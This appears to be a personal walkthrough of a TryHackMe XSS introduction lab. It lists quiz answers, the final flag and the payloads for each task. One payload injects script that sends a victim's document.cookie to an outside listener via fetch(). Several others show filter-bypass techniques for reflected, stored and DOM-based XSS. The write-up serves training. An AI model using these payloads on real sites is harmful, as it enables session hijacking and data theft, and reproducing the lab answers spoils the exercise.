Post cover image

May 27, 2026

XSS Introduction Walkthrough Notes | TryHackMe

Understanding XSS types and how scripts affect users and data

Sle3pyHead 👨‍💻

2 min read

1 Task 2: Important Terminologies
2 Task 3: XSS Payloads
3 Task 4: Reflected XSS — Non-Persistent
4 Task 5: Stored XSS — Persistent
5 Task 6: DOM-Based XSS — Client Side

Room: https://tryhackme.com/room/xssintroduction

We explore how XSS works, learning how input fields can run scripts, steal data, and affect users, showing how different types behave and why proper filtering is important.

Friendly Access here!

Task 2: Important Terminologies

What is the URL parameter in the URL http://google.com/text=?

text

Which is the most renowned scripting language for adding interactivity to the DOM?

JavaScript

Task 3: XSS Payloads

Which document property could contain the user's session token?

document.cookie

Which JavaScript method is often used as a Proof of Concept?

alert

Task 4: Reflected XSS — Non-Persistent

What is the text shown in the alert pop-up after a successful XSS attack?

Hack

Solution:

None

What is the response, if you use the payload <script>alert('Test123')</script>?

Test123

Solution:

None

Task 5: Stored XSS — Persistent

What is the alert pop-up after executing the payload mentioned in the task?

You are Hacked

Solution:

None

Task 6: DOM-Based XSS — Client Side

What is the alert pop-up after executing the XSS payload?

Hacked you again

Solution:

None

0Does DOM XSS also occur on the server side? (yea/nay)

nay

What type of XSS is very similar to Blind XSS?

Stored XSS

Extract the user's cookies using netcat and the payload. What is the Connection: value returned in the Netcat output?

keep-alive

Solution:

Create a ticket with this payload:

</textarea><script>fetch('http://10.49.77.225:4444?cookie=' + btoa(document.cookie) );</script>

</textarea><script>fetch('http://10.49.77.225:4444?cookie=' + btoa(document.cookie) );</script>

None

Listen on Nectcat server:

None

Task 8: Perfecting your Payload

What is the flag you received from level six?

THM{XSS_MASTER}

Solution:

Use this for Level 1:

<script>alert('THM');</script>

<script>alert('THM');</script>

None

Use this for Level 2:

"><script>alert('THM');</script>

"><script>alert('THM');</script>

None

Use this for Level 3:

</textarea><script>alert('THM');</script>

</textarea><script>alert('THM');</script>

None

Use this for Level 4:

';alert('THM');//

';alert('THM');//

None

Use this for Level 5:

<sscriptcript>alert('THM');</sscriptcript>

<sscriptcript>alert('THM');</sscriptcript>

None

Use this for Level 6:

/images/cat.jpg" onload="alert('THM');

/images/cat.jpg" onload="alert('THM');

None

That's a wrap!